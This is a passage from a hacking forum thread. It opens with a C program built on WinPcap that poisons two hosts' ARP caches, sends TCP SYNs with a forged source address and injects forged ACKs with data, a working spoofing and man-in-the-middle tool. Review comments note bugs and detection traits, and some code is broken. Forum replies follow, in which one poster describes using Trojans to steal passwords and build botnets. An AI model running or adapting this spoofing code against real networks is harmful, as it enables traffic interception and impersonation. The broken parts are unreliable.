// NOTE(review): the thread handles returned by CreateThread are discarded and
// never closed, and thread-creation failure is not checked.
CHEAT_ARP_INFO info1={0},info2={0};
memcpy(info1.simulateIP,SIMULATE_IP,strlen(SIMULATE_IP));
memcpy(info1.targetIP,TARGET_IP,strlen(TARGET_IP));
memcpy(info1.targetMAC,TARGET_MAC,strlen(TARGET_MAC));
::CreateThread(NULL,0,ArpCheat,&info1,0,NULL);
memcpy(info2.simulateIP,TARGET_IP,strlen(TARGET_IP));
memcpy(info2.targetIP,SIMULATE_IP,strlen(SIMULATE_IP));
memcpy(info2.targetMAC,SIMULATE_MAC,strlen(SIMULATE_MAC));
::CreateThread(NULL,0,ArpCheat,&info2,0,NULL);
Sleep(50);
::CreateThread(NULL,0,SendSyn,NULL,0,NULL);
ListenACK();
PacketCloseAdapter(lpAdapter);
::WSACleanup();
return 0;
}
// Thread routine: roughly every 100 ms builds and transmits one raw
// Ethernet/IPv4/TCP SYN frame from SIMULATE_IP to TARGET_IP:targetPort, with
// LOCAL_MAC as the Ethernet source. `no` is unused. The loop never terminates,
// so the final `return 0` is not reached.
//
// Properties of the traffic that are visible in this code and useful for
// detection: the IP source is SIMULATE_IP while the Ethernet source is
// LOCAL_MAC; the TCP source port and the IP identification both increase by one
// per frame; and each frame is handed to the driver as a fixed 128-byte buffer,
// so the 62 bytes of headers are followed by zero padding.
//
// NOTE(review): both `continue` paths skip PacketFreePacket and the Sleep, so a
// persistent failure leaks one packet object per iteration in a tight loop.
// PacketAllocatePacket's result is not checked for NULL.
DWORD WINAPI SendSyn(void *no)
{
Sleep(100);
while(TRUE)
{
char s_mac[6]={0},d_mac[6]={0};
char sendSynBuf[128]={0};
ET_HEADER et_header={0};
IP_HEADER ip_header={0};
TCP_HEADER tcp_header={0};
TCP_OPTION tcp_option={0};
PSD_HEADER psd_header={0};
StrToMac(LOCAL_MAC,s_mac); //local_mac
memcpy(et_header.eh_src,s_mac,6);
StrToMac(TARGET_MAC,d_mac); //dest_mac
memcpy(et_header.eh_dst,d_mac,6);
et_header.eh_type=htons(0x0800);
// IPv4 header: version 4, 5 words long (no options).
ip_header.m_ver_hlen=(4<<4|5);
ip_header.m_tos=0;
ip_header.m_tlen=htons(sizeof(IP_HEADER)+sizeof(TCP_HEADER)+sizeof(TCP_OPTION));
ip_header.m_ident=htons(ipID++);
// 16384 = 0x4000: Don't Fragment set, fragment offset 0.
ip_header.m_flag_frag=htons(16384);
ip_header.m_ttl=128;
ip_header.m_protocol=IPPROTO_TCP;
// The checksum field must be zero while the checksum is computed.
ip_header.m_cksum=0;
ip_header.m_sIP=inet_addr(SIMULATE_IP);
ip_header.m_dIP=inet_addr(TARGET_IP);
ip_header.m_cksum=CheckSum((USHORT *)&ip_header,sizeof(IP_HEADER));
// Fill in the TCP header and the TCP options:
tcp_header.m_dport=htons(targetPort);
tcp_header.m_sport=htons(sourcePort++);
// Initial sequence number taken from the tick count (stored without htonl).
tcp_header.m_seq=::GetTickCount();
tcp_header.m_ack=0;
// Data offset = (20-byte header + 8 bytes of options) / 4 = 7 words.
tcp_header.m_hlen_res4=(((sizeof(TCP_HEADER)+sizeof(TCP_OPTION))/4)<<4);
tcp_header.m_res2_flag=2; // SYN only
tcp_header.m_win=htons(16384);
tcp_header.m_cksum=0;
tcp_header.m_urp=0;
// Options: MSS 1460, two no-ops, SACK permitted.
tcp_option.unKnown=htons(516);
tcp_option.maxSegSize=htons(1460);
tcp_option.no1=1;
tcp_option.no2=1;
tcp_option.SACK=htons(1026);
// The TCP checksum covers pseudo-header + header + options, assembled in a
// scratch buffer that is never sent.
psd_header.m_daddr=ip_header.m_dIP;
psd_header.m_saddr=ip_header.m_sIP;
psd_header.m_mbz=0;
psd_header.m_ptcl=IPPROTO_TCP;
psd_header.m_tcpl=htons(sizeof(TCP_HEADER)+sizeof(TCP_OPTION));
char tcpBuf[128]={0};
memcpy(tcpBuf,&psd_header,sizeof(PSD_HEADER));
memcpy(tcpBuf+sizeof(PSD_HEADER),&tcp_header,sizeof(TCP_HEADER));
memcpy(tcpBuf+sizeof(PSD_HEADER)+sizeof(TCP_HEADER),&tcp_option,sizeof(TCP_OPTION));
tcp_header.m_cksum=CheckSum((USHORT *)tcpBuf,sizeof(PSD_HEADER)+sizeof(TCP_HEADER)+sizeof(TCP_OPTION));
// Assemble the frame that is actually transmitted.
memcpy(sendSynBuf,&et_header,sizeof(ET_HEADER));
memcpy(sendSynBuf+sizeof(ET_HEADER),&ip_header,sizeof(IP_HEADER));
memcpy(sendSynBuf+sizeof(ET_HEADER)+sizeof(IP_HEADER),&tcp_header,sizeof(TCP_HEADER));
memcpy(sendSynBuf+sizeof(ET_HEADER)+sizeof(IP_HEADER)+sizeof(TCP_HEADER),&tcp_option,sizeof(TCP_OPTION));
LPPACKET lpPacket;
lpPacket=PacketAllocatePacket();
// The whole 128-byte buffer is registered, not just the bytes filled in above.
PacketInitPacket(lpPacket,sendSynBuf,128);
if(PacketSetNumWrites(lpAdapter,1)==FALSE)
{
printf("Warning: Unable to send more than one packet in a single write!\n");
continue;
}
if(PacketSendPacket(lpAdapter,lpPacket,TRUE)==FALSE)
{
printf("Error sending the packets!\n");
continue;
}
PacketFreePacket(lpPacket);
Sleep(100);
}
return 0;
}
// Thread routine: builds one ARP reply (opcode 2) and resends it every 3 seconds
// until PacketSendPacket fails, then frees the packet and returns 0.
//
// pInfo points to a CHEAT_ARP_INFO, which is copied locally on entry. The frame
// is addressed to info.targetMAC and carries info.simulateIP as the sender IP
// with LOCAL_MAC as the sender hardware address.
//
// Detection-relevant properties visible here: the replies are unsolicited,
// repeat on a fixed 3000 ms period, and bind info.simulateIP to LOCAL_MAC. That
// is the pattern ARP-monitoring tools and switch-level ARP inspection look for.
//
// NOTE(review): PacketAllocatePacket's result is not checked, and a failed
// PacketSetNumWrites only prints a warning before sending goes ahead.
DWORD WINAPI ArpCheat(void *pInfo)
{
CHEAT_ARP_INFO info={0};
memcpy(&info,pInfo,sizeof(CHEAT_ARP_INFO));
char s_mac[6]={0},d_mac[6]={0};
ET_HEADER et_header={0};
ARP_HEADER arp_header={0};
char buffer[64]={0};
StrToMac(LOCAL_MAC,s_mac);
memcpy(et_header.eh_src,s_mac,6);
StrToMac(info.targetMAC,d_mac);
memcpy(et_header.eh_dst,d_mac,6);
et_header.eh_type=htons(0x0806);
// Ethernet (1) / IPv4 (0x0800) ARP with 6-byte and 4-byte addresses.
arp_header.arp_hdr=htons(0x0001);
arp_header.arp_pro=htons(0x0800);
arp_header.arp_hln=6;
arp_header.arp_pln=4;
arp_header.arp_opt=htons(0x0002);
arp_header.arp_spa=inet_addr(info.simulateIP); //source_ip
// Sender hardware address is copied from the Ethernet source, i.e. LOCAL_MAC.
memcpy(arp_header.arp_sha,et_header.eh_src,6);
arp_header.arp_tpa=inet_addr(info.targetIP); //target_ip
memcpy(arp_header.arp_tha,et_header.eh_dst,6);
memcpy(buffer,&et_header,sizeof(ET_HEADER));
memcpy(buffer+sizeof(ET_HEADER),&arp_header,sizeof(ARP_HEADER));
LPPACKET lpPacket;
lpPacket=PacketAllocatePacket();
// All 64 bytes are registered; the 42 bytes of headers are followed by zeros.
PacketInitPacket(lpPacket,buffer,64);
if(PacketSetNumWrites(lpAdapter,1)==FALSE)
printf("warning: Unable to send more than one packet in a single write!\n");
while(TRUE)
{
if(PacketSendPacket(lpAdapter,lpPacket,TRUE)==FALSE)
{
printf("Error sending the packets!\n");
break;
}
Sleep(3000);
}
PacketFreePacket(lpPacket);
return 0;
}
// Receive loop run on the main thread. Configures the adapter (hardware filter
// NDIS_PACKET_TYPE_DIRECTED, 1024-byte driver buffer, read timeout 2) and then
// repeatedly reads into a 512-byte buffer and hands each read to
// AssayAndSendData.
//
// NOTE(review): the loop has no exit condition, so the PacketFreePacket and
// `return` after it are unreachable; if they were reached, lpPacket would be
// freed a second time. Return values of the PacketSet* calls and of
// PacketAllocatePacket are not checked.
void ListenACK()
{
LPPACKET lpPacket;
char recvBuf[512]={0};
PacketSetHwFilter(lpAdapter, NDIS_PACKET_TYPE_DIRECTED);
PacketSetBuff(lpAdapter,1024);
PacketSetReadTimeout(lpAdapter,2);
while(TRUE)
{
// A packet object is allocated and freed on every iteration.
lpPacket=PacketAllocatePacket();
PacketInitPacket(lpPacket,recvBuf,512);
if(PacketReceivePacket(lpAdapter,lpPacket,TRUE)==TRUE)
AssayAndSendData(lpPacket);
else
printf("Recv Error!\n");
PacketFreePacket(lpPacket);
// Clear the buffer so a later read cannot be confused with stale bytes.
memset(recvBuf,0,512);
Sleep(10);
}
PacketFreePacket(lpPacket);
return;
}
// Computes the 16-bit one's-complement checksum used by the IPv4 and TCP headers.
//
// buffer: start of the data, read as consecutive 16-bit words.
// size:   number of bytes to cover; a trailing odd byte is added on its own.
// Returns the complemented, folded sum; the caller stores it as-is in the header.
USHORT CheckSum(USHORT *buffer, int size)
{
    unsigned long sum = 0;
    const USHORT *word = buffer;
    int remaining = size;

    // Add up every complete 16-bit word.
    for (; remaining > 1; remaining -= sizeof(USHORT))
    {
        sum += *word;
        ++word;
    }

    // A leftover byte contributes its value once.
    if (remaining != 0)
    {
        sum += *reinterpret_cast<const UCHAR *>(word);
    }

    // Fold the carries back into the low 16 bits, twice, then complement.
    sum = (sum & 0xffff) + (sum >> 16);
    sum += sum >> 16;
    return (USHORT)(~sum);
}
// Converts a 12-character hexadecimal MAC string (no separators) into 6 bytes.
//
// str: input text; two characters are consumed per output byte. Only the
//      lowercase letters a-f are mapped as hex digits; every other character
//      is passed through atoi.
// mac: destination for the 6 decoded bytes.
//
// NOTE(review): the listing as posted appears damaged by the forum rendering.
// The store at the end of the loop assigns an int to the `mac` pointer itself,
// which does not compile and would not fill the caller's buffer.
// NOTE(review): `atoi(&temp)` is given the address of a single char with no
// terminating NUL, so it can read past `temp`. Uppercase A-F and non-hex
// characters are not rejected; they become whatever atoi returns.
void StrToMac(char *str,char *mac)
{
char *str1;
int i;
int low,high;
char temp;
for(i=0;i<6;i++)
{
str1=str+1;
// High nibble: first character of the pair.
switch(*str)
{
case 'a':high=10;
break;
case 'b':high=11;
break;
case 'c':high=12;
break;
case 'd':high=13;
break;
case 'e':high=14;
break;
case 'f':high=15;
break;
default:temp=*str;
high=atoi(&temp);
}
// Low nibble: second character of the pair.
switch(*str1)
{
case 'a':low=10;
break;
case 'b':low=11;
break;
case 'c':low=12;
break;
case 'd':low=13;
break;
case 'e':low=14;
break;
case 'f':low=15;
break;
default:temp=*str1;
low=atoi(&temp);
}
mac=high*16+low;
str+=2;
}
}
// Inspects one captured buffer and, if it starts with an IPv4/TCP segment from
// TARGET_IP to SIMULATE_IP that has the ACK flag set and a non-zero window,
// transmits a forged ACK segment in the opposite direction carrying the 10-byte
// payload in `data`.
//
// lpPacket: packet object filled by PacketReceivePacket; its Buffer begins with
//           a bpf_hdr followed by the captured frame.
//
// The reply reuses the peer's ports (swapped), takes its sequence number from
// the peer's acknowledgement number, and is sent with SIMULATE_IP as the IP
// source and LOCAL_MAC as the Ethernet source, the same address mismatch that
// marks the frames built by SendSyn.
//
// NOTE(review): captured, attacker-independent network data is parsed with no
// length checks: neither lpPacket->ulBytesReceived nor the bpf_hdr capture
// length is consulted before the Ethernet, IP and TCP headers are dereferenced.
// The IP header is assumed to be exactly 20 bytes (the IHL nibble is ignored),
// and the `-40` below assumes 20-byte IP and TCP headers. Only the first packet
// in the capture buffer is examined.
// NOTE(review): both early `return` paths leak lpSendPacket; `addr` is unused;
// the line containing only `:` is not valid C++ and looks like forum-rendering
// damage.
void AssayAndSendData(LPPACKET lpPacket)
{
char *buf;
bpf_hdr *lpBpfhdr;
ET_HEADER *lpEthdr;
in_addr addr={0};
buf=(char *)lpPacket->Buffer;
lpBpfhdr=(bpf_hdr *)buf;
// The captured frame starts bh_hdrlen bytes into the buffer.
lpEthdr=(ET_HEADER *)(buf+lpBpfhdr->bh_hdrlen);
if(lpEthdr->eh_type==htons(0x0800))
{
IP_HEADER *lpIphdr=(IP_HEADER *)(buf+lpBpfhdr->bh_hdrlen+sizeof(ET_HEADER));
if( ( inet_addr(SIMULATE_IP)==lpIphdr->m_dIP ) && ( inet_addr(TARGET_IP)==lpIphdr->m_sIP ) && (lpIphdr->m_protocol==IPPROTO_TCP) )
{
TCP_HEADER *lpTcphdr=(TCP_HEADER *)(buf+lpBpfhdr->bh_hdrlen+sizeof(ET_HEADER)+sizeof(IP_HEADER));
// Only segments with ACK set and a non-zero window are answered.
if( ( (lpTcphdr->m_res2_flag & 0x10)!=0 ) && ( lpTcphdr->m_win!=0 ) )
{
char s_mac[6]={0},d_mac[6]={0};
char sendSynBuf[128]={0};
char *data="ffantasyYD";
ET_HEADER et_header={0};
IP_HEADER ip_header={0};
TCP_HEADER tcp_header={0};
PSD_HEADER psd_header={0};
StrToMac(LOCAL_MAC,s_mac); //local_mac
memcpy(et_header.eh_src,s_mac,6);
StrToMac(TARGET_MAC,d_mac); //dest_mac
memcpy(et_header.eh_dst,d_mac,6);
et_header.eh_type=htons(0x0800);
ip_header.m_ver_hlen=(4<<4|5);
ip_header.m_tos=0;
ip_header.m_tlen=htons(sizeof(IP_HEADER)+sizeof(TCP_HEADER)+strlen(data));
ip_header.m_ident=htons(ipID++);
ip_header.m_flag_frag=htons(16384);
ip_header.m_ttl=128;
ip_header.m_protocol=IPPROTO_TCP;
ip_header.m_cksum=0;
ip_header.m_sIP=inet_addr(SIMULATE_IP);
ip_header.m_dIP=inet_addr(TARGET_IP);
ip_header.m_cksum=CheckSum((USHORT *)&ip_header,sizeof(IP_HEADER));
// Ports are swapped relative to the received segment; both stay in
// network byte order, so no conversion is applied.
tcp_header.m_dport=lpTcphdr->m_sport;
tcp_header.m_sport=lpTcphdr->m_dport;
tcp_header.m_seq=lpTcphdr->m_ack;
// Exactly SYN+ACK (0x12): acknowledge the peer's sequence number + 1.
// Otherwise: acknowledge sequence number + (IP total length - 40).
if(lpTcphdr->m_res2_flag==0x12)
tcp_header.m_ack=htonl(ntohl(lpTcphdr->m_seq)+1);
else
tcp_header.m_ack=htonl(ntohl(lpTcphdr->m_seq)+ntohs(lpIphdr->m_tlen)-40);
tcp_header.m_hlen_res4=((sizeof(TCP_HEADER)/4)<<4);
tcp_header.m_res2_flag=0x10; // ACK only
tcp_header.m_win=lpTcphdr->m_win;
tcp_header.m_cksum=0;
tcp_header.m_urp=0;
// TCP checksum over pseudo-header + header + payload, built in a scratch
// buffer that is never sent.
psd_header.m_daddr=ip_header.m_dIP;
psd_header.m_saddr=ip_header.m_sIP;
psd_header.m_mbz=0;
psd_header.m_ptcl=IPPROTO_TCP;
psd_header.m_tcpl=htons(sizeof(TCP_HEADER)+strlen(data));
char tcpBuf[128]={0};
memcpy(tcpBuf,&psd_header,sizeof(PSD_HEADER));
memcpy(tcpBuf+sizeof(PSD_HEADER),&tcp_header,sizeof(TCP_HEADER));
memcpy(tcpBuf+sizeof(PSD_HEADER)+sizeof(TCP_HEADER),data,strlen(data));
tcp_header.m_cksum=CheckSum((USHORT *)tcpBuf,sizeof(PSD_HEADER)+sizeof(TCP_HEADER)+strlen(data));
memcpy(sendSynBuf,&et_header,sizeof(ET_HEADER));
memcpy(sendSynBuf+sizeof(ET_HEADER),&ip_header,sizeof(IP_HEADER));
memcpy(sendSynBuf+sizeof(ET_HEADER)+sizeof(IP_HEADER),&tcp_header,sizeof(TCP_HEADER));
memcpy(sendSynBuf+sizeof(ET_HEADER)+sizeof(IP_HEADER)+sizeof(TCP_HEADER),data,strlen(data));
:
LPPACKET lpSendPacket;
lpSendPacket=PacketAllocatePacket();
// The full 128-byte buffer is registered, so the frame is zero-padded.
PacketInitPacket(lpSendPacket,sendSynBuf,128);
if(PacketSetNumWrites(lpAdapter,1)==FALSE)
{
printf("Warning: Unable to send more than one packet in a single write!\n");
return;
}
if(PacketSendPacket(lpAdapter,lpSendPacket,TRUE)==FALSE)
{
printf("Error sending the packets!\n");
return;
}
PacketFreePacket(lpSendPacket);
}
}
}
return;
}
- Lyecdevf
So are you talking about software or hardware? caisher wrote: Here, I have to admit that hackers in China, the technology can often break certain extent,
caisher wrote: the purpose of my coming here is to find a technology can further enhance their own path.
You mean the the Chinese hackers?
We will either find a way, or make one.
- Hannibal
- Hannibal
chinese food
I agree, lay off the cia.gov website. This forum is not going to teach how to break in to specific websites. We don't need any problems dragged in by a new member.
Thanks for the cia screenshot, I use it for my desktop now
You are still welcome as far as I am concerned, try to be more specific on what you need.
DNR
Thanks for the cia screenshot, I use it for my desktop now
You are still welcome as far as I am concerned, try to be more specific on what you need.
DNR
-
He gives wisdom to the wise and knowledge to the discerning. He reveals deep and hidden things; he knows what lies in Darkness, and Light dwells with him.
He gives wisdom to the wise and knowledge to the discerning. He reveals deep and hidden things; he knows what lies in Darkness, and Light dwells with him.
Regarding China's hackers, most of us learn hacking technology to make a living. After breaking into a web site, we only leave a virus.
This is because most of our people will take into account the interests
of this.Since the emergence of rootkit,this marks the advent of an era,
it is called "gray doves" era.Generally we use Trojan control other people's computers, will be to steal some password, or set up a zombie network.This is because this business has a lot of money results,most of us hackers to stay in the technical rootkit stage, will never be able to improve.I came here, and here is trying to bring advanced technology to China . My English is not very good, it is impossible to explain too much.
I hope you will support...^ We should know that our technology is far behind you..
This is because most of our people will take into account the interests
of this.Since the emergence of rootkit,this marks the advent of an era,
it is called "gray doves" era.Generally we use Trojan control other people's computers, will be to steal some password, or set up a zombie network.This is because this business has a lot of money results,most of us hackers to stay in the technical rootkit stage, will never be able to improve.I came here, and here is trying to bring advanced technology to China . My English is not very good, it is impossible to explain too much.
I hope you will support...^ We should know that our technology is far behind you..